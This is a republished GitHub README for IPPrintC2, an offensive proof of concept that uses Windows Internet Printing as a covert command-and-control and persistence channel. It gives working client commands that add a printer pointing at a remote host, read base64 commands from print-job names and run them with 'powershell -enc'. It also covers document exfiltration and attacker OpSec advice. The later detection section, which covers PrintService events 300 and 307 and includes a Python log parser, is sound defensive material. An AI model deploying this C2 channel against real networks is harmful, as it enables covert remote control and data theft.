PoC for using MS Windows printers for persistence / command and control via Internet Printing


IPPrint C2

TL;DR

A Proof-of-Concept for using Microsoft Windows printers for persistence / command and control via Internet Printing.

Printing systems are an often overlooked target for attackers looking to establish command and control (C2) channels on a victim’s network. An attacker can abuse the operating system’s printing system to add and remove printers and create and manipulate printing jobs to achieve full C2 communication. We have developed a complete proof of concept of such a solution that we have successfully tested in real-world red teaming exercises. By understanding the approach taken in this specific abuse of printing systems, we can take steps to secure them and prevent them from being exploited by malicious actors.

Background story

The idea was to create a basic C2 for engagements using built-in Windows functionalities, which can then be used to execute arbitrary commands or load a preferable C2 solution (https://howto.thec2matrix.com/).

A feature in Microsoft Windows was used that enables installation of shared printers through the Internet Printing Protocol (https://en.wikipedia.org/wiki/Internet_Printing_Protocol). Regular users can add a printer without administrative privileges as long as no driver installation is required, so using an already present driver was mandatory. The default “Microsoft Print to PDF” driver was used.

The commands to be executed are sent from the C2 Internet Printing server to the printer’s document queue as base64-encoded document names. With basic PowerShell, clients can then read these document names from the queue and execute the commands on themselves. Clients can also print documents to this printer, which are saved to a file on the C2 server; this is useful for fetching the results of executed commands or for exfiltrating documents. An additional plus was that adding a printer shared on the Internet passed through a couple of web proxy solutions commonly used in enterprises. Tested on Windows Server 2019 and Windows 10 / 11.

Server

Internet Information Services, Windows Print Services, Print Server and Internet Printing are required to set up a C2 server. Anonymous authentication is enabled on Internet Information Services so clients can obtain the document queue without authentication, and the owner of print jobs is the IUSR user account. The server also installs the shared printer for itself and uses it to submit jobs to its own print queue; otherwise the document owner would not be the IUSR user and clients would not be able to read the document names from the queue.

The installation script is provided in this repository and should work. Check if you can access your printer to make sure everything went well:

http(s)://<IP or DNS>/printers/
http(s)://<IP or DNS>/printers/<printername>/.printer

Once all is set up, run IPPrintC2.ps1 and enter the commands that you would like to execute on the client through the document name. The document name has a length limit, so if the base64-encoded command is longer than 255 characters it gets split across several documents in the print queue. The splitting is handled by the IPPrintC2 script, while the concatenation is handled by the client.

PS C:\Users\administrator\Desktop> .\IPPrintC2.ps1
IPPrint C2 Server
1. Select the default C2 printer.
2. Enter the command to execute on the client through the document name.
3. Enter the path of the PowerShell script you would like to execute.
4. Exfiltrate remote documents.
5. Read IIS logs.
6. Clear the print queue.
7. Kill all clients.
8. Quit.
What do you want to do?: 2
To print output of multiple commands, use this: [scriptblock]$x={whoami;hostname;ipconfig};$x.invoke()
Enter commands you wish to execute: [scriptblock]$x={whoami /all;hostname};$x.invoke()

You can also load PowerShell scripts. Keep the scripts simple as they may take a while to get split and sent to the document queue. Also, the scripts are one-off since the print queue eventually gets cleared and the character limit is 32767.

OpSec

  • Be sure to use the whitelist approach for the network segments you are targeting, otherwise anyone can access your print queue.
  • It is recommended to set up SSL for obvious reasons. The easiest way to set up SSL:

Client

To execute commands on the client, the addition of a printer and a persistent job to obtain and execute commands is needed. Examples:

PS C:\Users\regular> Add-Printer XPS -PortName https://somewhere.on.azure.com/printers/af/.printer -DriverName "Microsoft Print To PDF"

PS C:\Users\regular> Get-Printer XPS |fl


Name                         : XPS
ComputerName                 :
Type                         : Local
ShareName                    :
PortName                     : https://somewhere.on.azure.com/printers/af/.printer
DriverName                   : Microsoft Print To PDF
Location                     :
Comment                      :
SeparatorPageFile            :
PrintProcessor               : winprint
Datatype                     : RAW
Shared                       : False
Published                    : False
DeviceType                   : Print
PermissionSDDL               :
RenderingMode                :
KeepPrintedJobs              : False
Priority                     : 1
DefaultJobPriority           : 0
StartTime                    : 0
UntilTime                    : 0
PrinterStatus                : Normal
JobCount                     : 0
DisableBranchOfficeLogging   :
BranchOfficeOfflineLogSizeMB :
WorkflowPolicy               :

PS C:\Users\regular> ((get-printjob XPS).documentname -join "")
WwBzAGMAcgBpAHAAdABiAGwAbwBjAGsAXQAkAHgAPQB7AHcAaABvAGEAbQBpACAALwBhAGwAbAA7AGgAbwBzAHQAbgBhAG0AZQB9ADsAJAB4AC4AaQBuAHYAbwBrAGUAKAApAA==

PS C:\Users\regular> powershell -enc ((get-printjob XPS).documentname -join "")

USER INFORMATION
----------------

User Name               SID
======================= ==============================================
desktop-printingfun\regular S-1-5-21-1829223926-2430627930-1039442773-1002


GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes
====================================== ================ ============ ==================================================
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users          Alias            S-1-5-32-559 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE               Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

DESKTOP-PRINTINGFUN

Several payloads are available in the repository.

Detection

As always, the best way is to centrally monitor the logs of the infrastructure on your Security Operations Center / Security Information and Event Management solutions and use command-line logging / PowerShell Transcription.

By default, printer installation is not logged in the Event Viewer, but this can be enabled:

With the PrintService Operational log enabled you can monitor the installation of printers and related activity through Event IDs 300 (printer created) and 307 (document printed, including the port the job went to).

Log Name:      Microsoft-Windows-PrintService/Operational
Source:        Microsoft-Windows-PrintService
Date:          6/28/2022 9:15:42 AM
Event ID:      300
Task Category: Adding a printer
Level:         Information
Keywords:      Classic Spooler Event,Printer
User:          DESKTOP-PRINTINGFUN\regular
Computer:      DESKTOP-PRINTINGFUN
Description:
Printer XPS was created. No user action is required.
Event Xml:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-PrintService" Guid="{747ef6fd-e535-4d16-b510-42c90f6873a1}" />
    <EventID>300</EventID>
    <Version>0</Version>
    <Level>4</Level>
    <Task>4</Task>
    <Opcode>11</Opcode>
    <Keywords>0x4000000000000820</Keywords>
    <TimeCreated SystemTime="2022-06-28T07:15:42.7786608Z" />
    <EventRecordID>6</EventRecordID>
    <Correlation />
    <Execution ProcessID="2512" ThreadID="2824" />
    <Channel>Microsoft-Windows-PrintService/Operational</Channel>
    <Computer>DESKTOP-PRINTINGFUN</Computer>
    <Security UserID="S-1-5-21-1829223926-2430127930-1039111773-1002" />
  </System>
  <UserData>
    <PrinterCreated xmlns="http://manifests.microsoft.com/win/2005/08/windows/printing/spooler/core/events">
      <Param1>XPS</Param1>
    </PrinterCreated>
  </UserData>
</Event>
Log Name:      Microsoft-Windows-PrintService/Operational
Source:        Microsoft-Windows-PrintService
Date:          6/28/2022 11:15:16 AM
Event ID:      307
Task Category: Printing a document
Level:         Information
Keywords:      Classic Spooler Event,Document Print Job
User:          DESKTOP-PRINTINGFUN\regular
Computer:      DESKTOP-PRINTINGFUN
Description:
Document 4, Print Document owned by regular on \\DESKTOP-PRINTINGFUN was printed on XPS through port https://somewhere.on.azure.com/printers/printers/af/.printer.  Size in bytes: 69009. Pages printed: 1. No user action is required.
Event Xml:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-PrintService" Guid="{747ef6fd-e535-4d16-b510-42c90f6873a1}" />
    <EventID>307</EventID>
    <Version>0</Version>
    <Level>4</Level>
    <Task>26</Task>
    <Opcode>11</Opcode>
    <Keywords>0x4000000000000840</Keywords>
    <TimeCreated SystemTime="2022-06-28T09:15:16.1668381Z" />
    <EventRecordID>97</EventRecordID>
    <Correlation />
    <Execution ProcessID="2512" ThreadID="1848" />
    <Channel>Microsoft-Windows-PrintService/Operational</Channel>
    <Computer>DESKTOP-PRINTINGFUN</Computer>
    <Security UserID="S-1-5-21-1829223926-2430127930-1039111773-1002" />
  </System>
  <UserData>
    <DocumentPrinted xmlns="http://manifests.microsoft.com/win/2005/08/windows/printing/spooler/core/events">
      <Param1>4</Param1>
      <Param2>Print Document</Param2>
      <Param3>regular</Param3>
      <Param4>\\DESKTOP-PRINTINGFUN</Param4>
      <Param5>XPS</Param5>
      <Param6>https://somewhere.on.azure.com/printers/af/.printer</Param6>
      <Param7>69009</Param7>
      <Param8>1</Param8>
    </DocumentPrinted>
  </UserData>
</Event>
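The two event records above carry everything a detection needs: Event 300 names the printer a user created, and Event 307 reveals the port the job actually went to (Param6), which for an Internet Printing connection is an http(s) URL rather than a local port such as `PORTPROMPT:` or a `USB`/`WSD` port. As an added defender-side example that is not part of the original repository, the following Python parses Event XML in the shape shown above and flags every printer whose port is an http(s) URL on a host outside an allowlist of known corporate print servers; the creation event (300) for that printer is flagged as well once a later 307 exposes its remote port. The XPS records reuse the values from the page; the local “Microsoft Print to PDF” job, the `printsrv.corp.example` print server and the allowlist are constructed for the example.

```python
"""Flag printers reached over Internet Printing (http/https ports) in
Microsoft-Windows-PrintService/Operational Event 300 / 307 records."""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import Dict, List, Optional, Set
from urllib.parse import urlparse

EVT_NS = "http://schemas.microsoft.com/win/2004/08/events/event"
SPOOLER_NS = "http://manifests.microsoft.com/win/2005/08/windows/printing/spooler/core/events"
NS = {"e": EVT_NS, "s": SPOOLER_NS}

# An http(s) port name means jobs leave the host for a web server over IPP.
IPP_PORT_RE = re.compile(r"^https?://", re.IGNORECASE)


@dataclass
class PrintEvent:
    event_id: int
    computer: str
    user_sid: str
    printer: str
    port: Optional[str]  # only Event 307 (DocumentPrinted) carries the port


def parse_event(xml_text: str) -> PrintEvent:
    """Parse the Event XML as Event Viewer / Get-WinEvent ToXml() renders it."""
    root = ET.fromstring(xml_text)
    event_id = int(root.findtext("e:System/e:EventID", namespaces=NS))
    computer = root.findtext("e:System/e:Computer", default="", namespaces=NS)
    sec = root.find("e:System/e:Security", namespaces=NS)
    user_sid = sec.get("UserID", "") if sec is not None else ""
    if event_id == 300:    # PrinterCreated: Param1 = printer name
        printer = root.findtext("e:UserData/s:PrinterCreated/s:Param1", namespaces=NS)
        port = None
    elif event_id == 307:  # DocumentPrinted: Param5 = printer, Param6 = port
        printer = root.findtext("e:UserData/s:DocumentPrinted/s:Param5", namespaces=NS)
        port = root.findtext("e:UserData/s:DocumentPrinted/s:Param6", namespaces=NS)
    else:
        raise ValueError(f"unsupported PrintService event id {event_id}")
    return PrintEvent(event_id, computer, user_sid, printer, port)


def detect_ipp_printers(events: List[PrintEvent],
                        allowed_hosts: Set[str] = frozenset()) -> List[Dict[str, str]]:
    """One alert per event tied to a printer whose port is an http(s) URL on a
    host outside allowed_hosts. Event 300 (creation) is only flagged once a
    later 307 for the same printer name reveals the remote port."""
    remote_port: Dict[str, str] = {}
    for e in events:
        if e.event_id == 307 and e.port and IPP_PORT_RE.match(e.port):
            host = (urlparse(e.port).hostname or "").lower()
            if host not in allowed_hosts:
                remote_port[e.printer] = e.port
    alerts = []
    for e in events:
        if e.printer in remote_port:
            reason = ("printer created by user; later used with remote IPP port"
                      if e.event_id == 300 else "document sent to remote IPP port")
            alerts.append({"event_id": str(e.event_id), "computer": e.computer,
                           "user_sid": e.user_sid, "printer": e.printer,
                           "port": remote_port[e.printer], "reason": reason})
    return alerts


def _event_xml(event_id: int, computer: str, sid: str, user_data: str) -> str:
    """Constructed minimal Event XML with the fields the parser reads."""
    return (f'<Event xmlns="{EVT_NS}"><System><EventID>{event_id}</EventID>'
            f'<Computer>{computer}</Computer><Security UserID="{sid}"/></System>'
            f'<UserData>{user_data}</UserData></Event>')


SID = "S-1-5-21-1829223926-2430127930-1039111773-1002"  # from the page's samples
SAMPLE_EVENTS = [
    # Event 300 and 307 values taken from the records shown on this page
    _event_xml(300, "DESKTOP-PRINTINGFUN", SID,
               f'<PrinterCreated xmlns="{SPOOLER_NS}"><Param1>XPS</Param1></PrinterCreated>'),
    _event_xml(307, "DESKTOP-PRINTINGFUN", SID,
               f'<DocumentPrinted xmlns="{SPOOLER_NS}"><Param1>4</Param1><Param2>Print Document</Param2>'
               '<Param3>regular</Param3><Param4>\\\\DESKTOP-PRINTINGFUN</Param4><Param5>XPS</Param5>'
               '<Param6>https://somewhere.on.azure.com/printers/af/.printer</Param6>'
               '<Param7>69009</Param7><Param8>1</Param8></DocumentPrinted>'),
    # Constructed: an ordinary local "Print to PDF" job, which must not be flagged
    _event_xml(307, "DESKTOP-PRINTINGFUN", SID,
               f'<DocumentPrinted xmlns="{SPOOLER_NS}"><Param1>5</Param1><Param2>report.docx</Param2>'
               '<Param3>regular</Param3><Param4>\\\\DESKTOP-PRINTINGFUN</Param4>'
               '<Param5>Microsoft Print to PDF</Param5><Param6>PORTPROMPT:</Param6>'
               '<Param7>1024</Param7><Param8>1</Param8></DocumentPrinted>'),
    # Constructed: a job to the organisation's own IPP print server (allowlisted below)
    _event_xml(307, "DESKTOP-PRINTINGFUN", SID,
               f'<DocumentPrinted xmlns="{SPOOLER_NS}"><Param1>6</Param1><Param2>memo.pdf</Param2>'
               '<Param3>regular</Param3><Param4>\\\\DESKTOP-PRINTINGFUN</Param4><Param5>HR-Floor2</Param5>'
               '<Param6>http://printsrv.corp.example/printers/hr/.printer</Param6>'
               '<Param7>2048</Param7><Param8>1</Param8></DocumentPrinted>'),
]


def run_sample(allowed_hosts: Set[str] = frozenset({"printsrv.corp.example"})) -> List[Dict[str, str]]:
    events = [parse_event(x) for x in SAMPLE_EVENTS]
    return detect_ipp_printers(events, allowed_hosts)


if __name__ == "__main__":
    for a in run_sample():
        print(f"[{a['event_id']}] {a['computer']} {a['printer']} -> {a['port']}: {a['reason']}")
```

In production the records would come from the SIEM or from `Get-WinEvent -LogName Microsoft-Windows-PrintService/Operational` with each event's `ToXml()` output fed to `parse_event`; the allowlist should hold the hostnames of the organisation's own IPP print servers so that only printers pointing at arbitrary Internet hosts raise an alert.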

Files

  • Install/InstallScript.ps1 – PowerShell script that installs the prerequisites. You should set up SSL yourself
  • Server/IPPrintC2.ps1 – PowerShell script for IPPrintC2 that you run on the server hosting Print Services
  • Payloads/payloads.txt – basic list of payloads to get started

Notes

  • The C2 currently works as one-to-all. You can set up additional printers on the C2 server, modify the IPPrintC2.ps1 script, and run multiple instances
  • Exfiltration of documents needs improvement as it currently works with ASCII text-based files
  • Automatic cleaning of documents printed by clients requires improvements
  • The IPPrintC2 is provided as-is

In the process of writing this simple C2, it was discovered that a somewhat similar technique was also used by WithSecure and published earlier. Not only that, but the name (PrintC2) also was the same, so it was changed to IPPrintC2. Nevertheless, due to the differences and different initial mindset/purpose we decided to release our work.

References

Credits

  • Author: @kr3bz

Happy printing!

Originally published on GitHub: PoC for using MS Windows printers for persistence / command and control via Internet Printing

Copyright notice: posted by admin on 18 May 2024 at 10:08 AM.